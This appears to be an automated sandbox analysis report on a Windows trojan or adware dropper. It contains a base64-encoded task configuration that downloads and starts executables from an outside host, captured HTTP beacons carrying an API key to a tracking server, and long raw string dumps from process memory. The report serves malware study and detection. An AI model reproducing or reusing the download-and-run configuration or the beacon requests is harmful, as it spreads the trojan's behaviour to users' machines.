N18xMmgiLz4NCg0KPC9wZXJmb3JtPg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPS
JjaGVjayIgbmFtZT0iY2FzdGVyMTIiIHZhbHVlPSIxNy8wNS8yMDE3XzEyaCIgbWF0Y2g9
ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCg0KPC90YXNrPjx0YXNrPg0KDQo8cGVyZm
9ybT4NCg0KPGRvd25sb2FkIG5hbWU9ImNhc3RlcjE5IiB2YWx1ZT0iaHR0cDovL2FzZWRv
d25sb2FkZ2F0ZS5jb20vZG93bmxvYWQvMy93aXp6Y2FzdGVyX2luc3RhbGxlcl92Mi5leG
UiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIG5ldD0ieWVzIi8 DQo8cHJvY2VzcyB0eXBl
PSJzdGFydCIgbmFtZT0iY2FzdGVyMTkiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9IjU3YT
c2NGQwNDJiZjgiLz4NCjxtb2QgdHlwZT0iYWRkIiBuYW1lPSJjYXN0ZXIxOSIgdmFsdWU9
Inp6MTYvMDUvMjAxNyIvPg0KDQo8L3BlcmZvcm0 DQoNCjxjb25kaXRpb25zPg0KDQo8bW
9kIHR5cGU9ImNoZWNrIiBuYW1lPSJjYXN0ZXIxOSIgdmFsdWU9IjE2LzA1LzIwMTciIG1h
dGNoPSJmYWxzZSIvPg0KDQo8L2NvbmRpdGlvbnM DQoNCjwvdGFzaz48dGFzaz4NCg0KPH
BlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJhZHZpc2UiIHZhbHVlPSJodHRwOi8vYXNl
ZG93bmxvYWRnYXRlLmNvbS9kb3dubG9hZC8yL3dpenpyZWxlYXNlLmV4ZSIgdmVyc2lvbj
0iIiAgc29mdHdhcmU9IiIgLz4NCjxwcm9jZXNzIHR5cGU9InN0YXJ0IiBuYW1lPSJhZHZp
c2UiIHZhbHVlPSJ3YWl0IiBwYXJhbXM9InR1dG8xIi8 DQo8bW9kIHR5cGU9ImFkZCIgbm
FtZT0ibWFqaSIgdmFsdWU9IjE2LzA1LzIwMTYiLz4NCg0KPC9wZXJmb3JtPg0KDQo8

<<< skipped >>>

POST /wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



api_key=fa02609b-2368-11e6-922f-0cc47a47968c


HTTP/1.1 200 OK

Date: Sat, 17 Feb 2018 21:41:57 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=g00gr4i8nfin9vusuq9mjasgg7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....



POST /wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_notok HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue


HTTP/1.1 100 Continue
....



api_key=fa02609b-2368-11e6-922f-0cc47a47968c


HTTP/1.1 200 OK

Date: Sat, 17 Feb 2018 21:41:57 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=g1f5rutvm57ltms5rp4bjfn711; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..


The Trojan connects to the servers at the folowing location(s):

conhost.exe_512:

.text
`.data
.rsrc
@.reloc
GDI32.dll
USER32.dll
msvcrt.dll
ntdll.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
KERNEL32.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
Bv.SCv
PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected
Invalid message 0x%x
InitExtendedEditKeys: Unsupported version number(%d)
Console init failed with status 0x%x
CreateWindowsWindow failed with status 0x%x, gle = 0x%x
InitWindowsStuff failed with status 0x%x (gle = 0x%x)
InitSideBySide failed create an activation context. Error: %d
GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.
GetModuleFileNameW failed %d.
Invalid EventType: 0x%x
Dup handle failed for %d of %d (Status = 0x%x)
Couldn't grow input buffer, Status == 0x%x
InitializeScrollBuffer failed, Status = 0x%x
CreateWindow failed with gle = 0x%x
Opening Font file failed with error 0x%x
\ega.cpi
NtReplyWaitReceivePort failed with Status 0x%x
ConsoleOpenWaitEvent failed with Status 0x%x
NtCreatePort failed with Status 0x%x
GetCharWidth32 failed with error 0x%x
GetTextMetricsW failed with error 0x%x
GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x
RtlStringCchCopy failed with Status 0x%x
Cannot allocate 0n%d bytes
|%SWj
O.fBf;
ReCreateDbcsScreenBuffer failed. Restoring to CP=%d
Invalid Parameter: 0x%x, 0x%x, 0x%x
ConsoleKeyInfo buffer is full
Invalid screen buffer size (0x%x, 0x%x)
SetROMFontCodePage: failed to memory allocation %d bytes
FONT.NT
Failed to set font image. wc=x, sz=(%x,%x)
Failed to set font image. wc=x sz=(%x, %x).
Failed to set font image. wc=x sz=(%x,%x)
FullscreenControlSetColors failed - Status = 0x%x
FullscreenControlSetPalette failed - Status = 0x%x
WriteCharsFromInput failed 0x%x
WriteCharsFromInput failed %x
RtlStringCchCopyW failed with Status 0x%x
CreateFontCache failed with Status 0x%x
FTPh
\>.Sj
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
GetKeyboardState
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
_amsg_exit
_acmdln
ShipAssert
NtReplyWaitReceivePort
NtCreatePort
NtEnumerateValueKey
NtQueryValueKey
NtOpenKey
NtAcceptConnectPort
NtReplyPort
SetProcessShutdownParameters
GetCPInfo
conhost.pdb
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
version="5.1.0.0"
name="Microsoft.Windows.ConsoleHost"
<requestedExecutionLevel
name="Microsoft.Windows.ConsoleHost.SystemDefault"
publicKeyToken="6595b64144ccf1df"
name="Microsoft.Windows.SystemCompatible"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
< =$>:>@>
2%2X2
%SystemRoot%
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen
WindowSize
ColorTableu
ExtendedEditkeyCustom
ExtendedEditKey
Software\Microsoft\Windows\CurrentVersion
\ !:=/.<>;|&
%d/%d
cmd.exe
desktop.ini
\console.dll
%d/%d
6.1.7601.17641 (win7sp1_gdr.110623-1503)
CONHOST.EXE
Windows
Operating System
6.1.7601.17641

conhost.exe_2580:

.text
`.data
.rsrc
@.reloc
GDI32.dll
USER32.dll
msvcrt.dll
ntdll.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
KERNEL32.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
Bv.SCv
PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected
Invalid message 0x%x
InitExtendedEditKeys: Unsupported version number(%d)
Console init failed with status 0x%x
CreateWindowsWindow failed with status 0x%x, gle = 0x%x
InitWindowsStuff failed with status 0x%x (gle = 0x%x)
InitSideBySide failed create an activation context. Error: %d
GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.
GetModuleFileNameW failed %d.
Invalid EventType: 0x%x
Dup handle failed for %d of %d (Status = 0x%x)
Couldn't grow input buffer, Status == 0x%x
InitializeScrollBuffer failed, Status = 0x%x
CreateWindow failed with gle = 0x%x
Opening Font file failed with error 0x%x
\ega.cpi
NtReplyWaitReceivePort failed with Status 0x%x
ConsoleOpenWaitEvent failed with Status 0x%x
NtCreatePort failed with Status 0x%x
GetCharWidth32 failed with error 0x%x
GetTextMetricsW failed with error 0x%x
GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x
RtlStringCchCopy failed with Status 0x%x
Cannot allocate 0n%d bytes
|%SWj
O.fBf;
ReCreateDbcsScreenBuffer failed. Restoring to CP=%d
Invalid Parameter: 0x%x, 0x%x, 0x%x
ConsoleKeyInfo buffer is full
Invalid screen buffer size (0x%x, 0x%x)
SetROMFontCodePage: failed to memory allocation %d bytes
FONT.NT
Failed to set font image. wc=x, sz=(%x,%x)
Failed to set font image. wc=x sz=(%x, %x).
Failed to set font image. wc=x sz=(%x,%x)
FullscreenControlSetColors failed - Status = 0x%x
FullscreenControlSetPalette failed - Status = 0x%x
WriteCharsFromInput failed 0x%x
WriteCharsFromInput failed %x
RtlStringCchCopyW failed with Status 0x%x
CreateFontCache failed with Status 0x%x
FTPh
\>.Sj
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
GetKeyboardState
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
_amsg_exit
_acmdln
ShipAssert
NtReplyWaitReceivePort
NtCreatePort
NtEnumerateValueKey
NtQueryValueKey
NtOpenKey
NtAcceptConnectPort
NtReplyPort
SetProcessShutdownParameters
GetCPInfo
conhost.pdb
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
version="5.1.0.0"
name="Microsoft.Windows.ConsoleHost"
<requestedExecutionLevel
name="Microsoft.Windows.ConsoleHost.SystemDefault"
publicKeyToken="6595b64144ccf1df"
name="Microsoft.Windows.SystemCompatible"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
< =$>:>@>
2%2X2
%SystemRoot%
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen
WindowSize
ColorTableu
ExtendedEditkeyCustom
ExtendedEditKey
Software\Microsoft\Windows\CurrentVersion
\ !:=/.<>;|&
%d/%d
cmd.exe
desktop.ini
\console.dll
%d/%d
6.1.7601.17641 (win7sp1_gdr.110623-1503)
CONHOST.EXE
Windows
Operating System
6.1.7601.17641

%original file name%.exe_776_rwx_6A412000_00002000:

TjVJTj.JTj>
.Aj3Jij
Kj*9ij*.Mj
-Hjq.Hjw
-Hjq.Hj

UPT95S6V7.exe_1004_rwx_6A412000_00002000:

TjVJTj.JTj>
.Aj3Jij
Kj*9ij*.Mj
-Hjq.Hjw
-Hjq.Hj

S5XXHD713.exe_2920_rwx_6A412000_00002000:

TjVJTj.JTj>
.Aj3Jij
Kj*9ij*.Mj
-Hjq.Hjw
-Hjq.Hj

conhost.exe_2248:

.text
`.data
.rsrc
@.reloc
GDI32.dll
USER32.dll
msvcrt.dll
ntdll.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
KERNEL32.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
Bv.SCv
PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected
Invalid message 0x%x
InitExtendedEditKeys: Unsupported version number(%d)
Console init failed with status 0x%x
CreateWindowsWindow failed with status 0x%x, gle = 0x%x
InitWindowsStuff failed with status 0x%x (gle = 0x%x)
InitSideBySide failed create an activation context. Error: %d
GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.
GetModuleFileNameW failed %d.
Invalid EventType: 0x%x
Dup handle failed for %d of %d (Status = 0x%x)
Couldn't grow input buffer, Status == 0x%x
InitializeScrollBuffer failed, Status = 0x%x
CreateWindow failed with gle = 0x%x
Opening Font file failed with error 0x%x
\ega.cpi
NtReplyWaitReceivePort failed with Status 0x%x
ConsoleOpenWaitEvent failed with Status 0x%x
NtCreatePort failed with Status 0x%x
GetCharWidth32 failed with error 0x%x
GetTextMetricsW failed with error 0x%x
GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x
RtlStringCchCopy failed with Status 0x%x
Cannot allocate 0n%d bytes
|%SWj
O.fBf;
ReCreateDbcsScreenBuffer failed. Restoring to CP=%d
Invalid Parameter: 0x%x, 0x%x, 0x%x
ConsoleKeyInfo buffer is full
Invalid screen buffer size (0x%x, 0x%x)
SetROMFontCodePage: failed to memory allocation %d bytes
FONT.NT
Failed to set font image. wc=x, sz=(%x,%x)
Failed to set font image. wc=x sz=(%x, %x).
Failed to set font image. wc=x sz=(%x,%x)
FullscreenControlSetColors failed - Status = 0x%x
FullscreenControlSetPalette failed - Status = 0x%x
WriteCharsFromInput failed 0x%x
WriteCharsFromInput failed %x
RtlStringCchCopyW failed with Status 0x%x
CreateFontCache failed with Status 0x%x
FTPh
\>.Sj
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
GetKeyboardState
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
_amsg_exit
_acmdln
ShipAssert
NtReplyWaitReceivePort
NtCreatePort
NtEnumerateValueKey
NtQueryValueKey
NtOpenKey
NtAcceptConnectPort
NtReplyPort
SetProcessShutdownParameters
GetCPInfo
conhost.pdb
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
version="5.1.0.0"
name="Microsoft.Windows.ConsoleHost"
<requestedExecutionLevel
name="Microsoft.Windows.ConsoleHost.SystemDefault"
publicKeyToken="6595b64144ccf1df"
name="Microsoft.Windows.SystemCompatible"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
< =$>:>@>
2%2X2
%SystemRoot%
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen
WindowSize
ColorTableu
ExtendedEditkeyCustom
ExtendedEditKey
Software\Microsoft\Windows\CurrentVersion
\ !:=/.<>;|&
%d/%d
cmd.exe
desktop.ini
\console.dll
%d/%d
6.1.7601.17641 (win7sp1_gdr.110623-1503)
CONHOST.EXE
Windows
Operating System
6.1.7601.17641

PsVMEKV4knRwp57KTHIw.exe_2060_rwx_6A412000_00002000:

TjVJTj.JTj>
.Aj3Jij
Kj*9ij*.Mj
-Hjq.Hjw
-Hjq.Hj

RW4BpXx91k.exe_3924_rwx_00262000_00002000:

0'4' '$'

RW4BpXx91k.exe_3924_rwx_6A412000_00002000:

TjVJTj.JTj>
.Aj3Jij
Kj*9ij*.Mj
-Hjq.Hjw
-Hjq.Hj

b5rtg3zapo3.exe_1652:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
uxtheme.dll
userenv.dll
setupapi.dll
apphelp.dll
propsys.dll
dwmapi.dll
cryptbase.dll
oleacc.dll
version.dll
profapi.dll
comres.dll
clbcatq.dll
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SUPPRESSMSGBOXES
/PASSWORD=password
Specifies the password to use.
For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.5.7)
Inno Setup Messages (5.5.3)
user32.dll
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetWindowsDirectoryA
MsgWaitForMultipleObjects
ExitWindowsEx
comctl32.dll
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x
0.2.4

b5rtg3zapo3.tmp_796:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
uxtheme.dll
userenv.dll
setupapi.dll
apphelp.dll
propsys.dll
dwmapi.dll
cryptbase.dll
oleacc.dll
version.dll
profapi.dll
comres.dll
clbcatq.dll
%s_%d
EInvalidOperation
TKeyEvent
TKeyPressEvent
crSQLWait
t.HtR
EInvalidGraphicOperation
TWindowState
poProportional
KeyPreviewT
WindowState`
OnKeyDownD1A
OnKeyPress
OnKeyUp\0A
CTL3D32.DLL
PasswordCharD
ssHorizontal
OnKeyUp
RegDeleteKeyExA
advapi32.dll
.DEFAULT\Control Panel\International
user32.dll
shlwapi.dll
TPSExec
TPSRuntimeClassImporter
TPSExportedVar
Cannot Import
Interface not supported
TPSCustomDebugExec
TPSDebugExec
RICHED20.DLL
RICHED32.DLL
Rstrtmgr.dll
File I/O error %d
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
shell32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
WININIT.INI
t.Htb
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
RegCreateKeyEx
RegOpenKeyEx
sfc.dll
cmd.exe" /C "
COMMAND.COM" /C
PendingFileRenameOperations
PendingFileRenameOperations2
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)
OLEAUT32.DLL
Log opened. (Time zone: UTC%s%.2u:%.2u)
%s Log %s #%.3u.txt
MsgWaitForMultipleObjects
regsvr32.exe"
Cannot register 64-bit DLLs on this version of Windows
HELPER_EXE_AMD64
Cannot utilize 64-bit features on this version of Windows
64-bit helper EXE wasn't extracted
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
CreateNamedPipe
SetNamedPipeHandleState
helper %d 0x%x
Helper process PID: %u
Stopping 64-bit helper process. (PID: %u)
Helper process exited with failure code: 0x%x
TransactNamedPipe
TransactNamedPipe/GetOverlappedResult
Helper: Command did not execute
SOFTWARE\Microsoft\.NETFramework
.NET Framework not found
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
v4.0.30319
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
v2.0.50727
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
v1.1.4322
.NET Framework version %s not found
Fusion.dll
Failed to load .NET Framework DLL "%s"
Failed to get address of .NET Framework CreateAssemblyCache function
.NET Framework CreateAssemblyCache function failed
MoveFileEx failed (%d).
Deleting directory: %s
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d).
Deleting file: %s
Failed to delete the file; it may be in use (%d).
ExtractRecData: Unicode data unsupported by this build
The file appears to be in use (%d). Will delete on restart.
Decrementing shared count (%d-bit): %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Not unregistering DLL/OCX again: %s
Unregistering 64-bit type library: %s
Unregistering 32-bit type library: %s
Uninstalling from GAC: %s
Running Exec filename:
Running Exec parameters:
CreateProcess failed (%d).
Process exit code: %u
Running ShellExec filename:
Running ShellExec parameters:
ShellExecuteEx failed (%d).
Skipping RunOnceId "%s" filename: %s
Unregistering font: %s
zlib: Internal error. Code %d
1.2.1
bzlib: Internal error. Code %d
lzmadecomp: %s
lzmadecomp: Compressed data is corrupted (%d)
DecodeToBuf failed (%d)
UhQ%F
Uh$%F
TPasswordEdit
PasswordEdit(
PasswordD
c:\directory
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Uhß
PasswordPage
PasswordLabel
PasswordEdit
PasswordEditLabel$
Could not find page with ID %d
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s\%s_is1
RestartManager found an application using one of our files: %s
Can use RestartManager to avoid reboot? %s (%d)
CheckPassword
PrepareToInstall failed: %s
Need to restart Windows? %s
/:*?"<>|
\/:*?"<>|
%s-%d.bin
%s-%d%s.bin
..\DISK%d\
Asking user for new disk containing "%s".
Cannot read an encrypted file before the key has been set
LoggedMsgBox returned an unexpected value. Assuming Abort.
Software\Microsoft\Windows\CurrentVersion\Uninstall\
5.5.9 (a)
URLInfoAbout
URLUpdateInfo
Creating directory: %s
Setting permissions on directory: %s
Failed to set permissions on directory (%d).
Setting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Failed to set NTFS compression state (%d).
IMsg
Failed to set value in Fonts registry key.
Failed to open Fonts registry key.
Setting permissions on file: %s
Failed to set permissions on file (%d).
Setting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
%s: The existing file appears to be in use (%d). Will replace on restart.
%s: The existing file appears to be in use (%d). Retrying.
Dest filename: %s
Dest file is protected by Windows File Protection.
Time stamp of our file: %s
Time stamp of existing file: %s
Version of our file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Existing file is protected by Windows File Protection. Skipping.
Uninstaller requires administrator: %s
Registering file as a font ("%s")
Cannot install files to 64-bit locations on this version of Windows
desktop.ini
.ShellClassInfo
{0AFACED1-E828-11D1-9187-B532F1E9575D}
target.lnk
Desktop.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\
Section: %s
Entry: %s
Value: %s
Updating the .INI file.
Successfully updated the .INI file.
Skipping updating the .INI file, only updating uninstall log.
Setting permissions on registry key: %s\%s
Could not set permissions on the registry key because it currently does not exist.
Failed to set permissions on registry key (%d).
Cannot access 64-bit registry keys on this version of Windows
Registration executable created: %s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Registering 64-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 64-bit type library: %s
Registering 32-bit type library: %s
Directory for uninstall files: %s
Will append to existing uninstall log: %s
Will overwrite existing uninstall log: %s
Creating new uninstall log: %s
LoggedMsgBox returned an unexpected value. Assuming Cancel.
RmShutdown returned an error: %d
Fatal exception during installation process (%s):
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFiles: No files matching "%s" found
Invalid symbol '%s' found
Invalid token '%s' found
QuerySpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected status: %d
ShellExecuteEx
ShellExecuteEx returned hProcess=0
Wnd=$%x
FormKeyDown
PasswordCheckHash
Expression error '%s'
Password
SuppressMsgBoxes
Cannot evaluate "%s" constant during Uninstall
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Unknown custom message name "%s" in "cm" constant
srcexe
Cannot expand "pf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
uninstallexe
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Failed to expand shell folder constant "%s"
Unknown constant "%s"
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
cmd.exe
COMMAND.COM
\_setup64.tmp
shfolder.dll
_isetup\_shfoldr.dll
Failed to load DLL "%s"
Found pending rename or delete that matches one of our files: %s
Windows version: %u.%u.%u%s (NT platform: %s)
64-bit Windows: %s
Processor architecture: %s
Defaulting to %s for suppressed message box (%s):
Message box (%s):
User chose %s.
MsgBox failed.
/SPAWNWND=$%x /NOTIFYWND=$%x
64-bit install mode: %s
Windows
_isetup\_isdecmp.dll
_isetup\_iscrypt.dll
/Password=
/SuppressMsgBoxes
/DETACHEDMSG
-0.bin
Setup version: Inno Setup version 5.5.9 (a)
Original Setup EXE:
Not restarting Windows because Setup is being run from the debugger.
Restarting Windows.
Inno Setup version 5.5.9 (a)
Portions Copyright (C) 2000-2016 Martijn Laan
hXXp://VVV.innosetup.com/
hXXp://VVV.remobjects.com/ps
Cannot run files in 64-bit locations on this version of Windows
Type: Exec
Type: ShellExec
RmRestart returned an error: %d
Need to restart Windows, not attempting to restart applications
Will not restart Windows automatically.
System\CurrentControlSet\Control\Windows
TOutputMsgWizardPage
TOutputMsgMemoWizardPage
PasswordEdit
PasswordEditLabel
MsgLabel
Msg1Label
Msg2Label
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
procedure DeleteIniEntry(const Section, Key, Filename: String);
function GetCmdTail: String;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function CheckForMutexes(Mutexes: String): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function MakePendingFileRenameOperationsChecksum: String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function ExitSetupMsgBox: Boolean;
function GetWindowsVersion: Cardinal;
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
function GetWindowsVersionString: String;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function CustomMessage(const MsgName: String): String;
function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
procedure RaiseException(const Msg: String);
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
Cannot call "%s" function during Setup
Cannot call "%s" function during Uninstall
Cannot call "%s" function during non Unicode Setup or Uninstall
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGMEMOPAGE
MSGBOX
Invalid RootKey value
INIKEYEXISTS
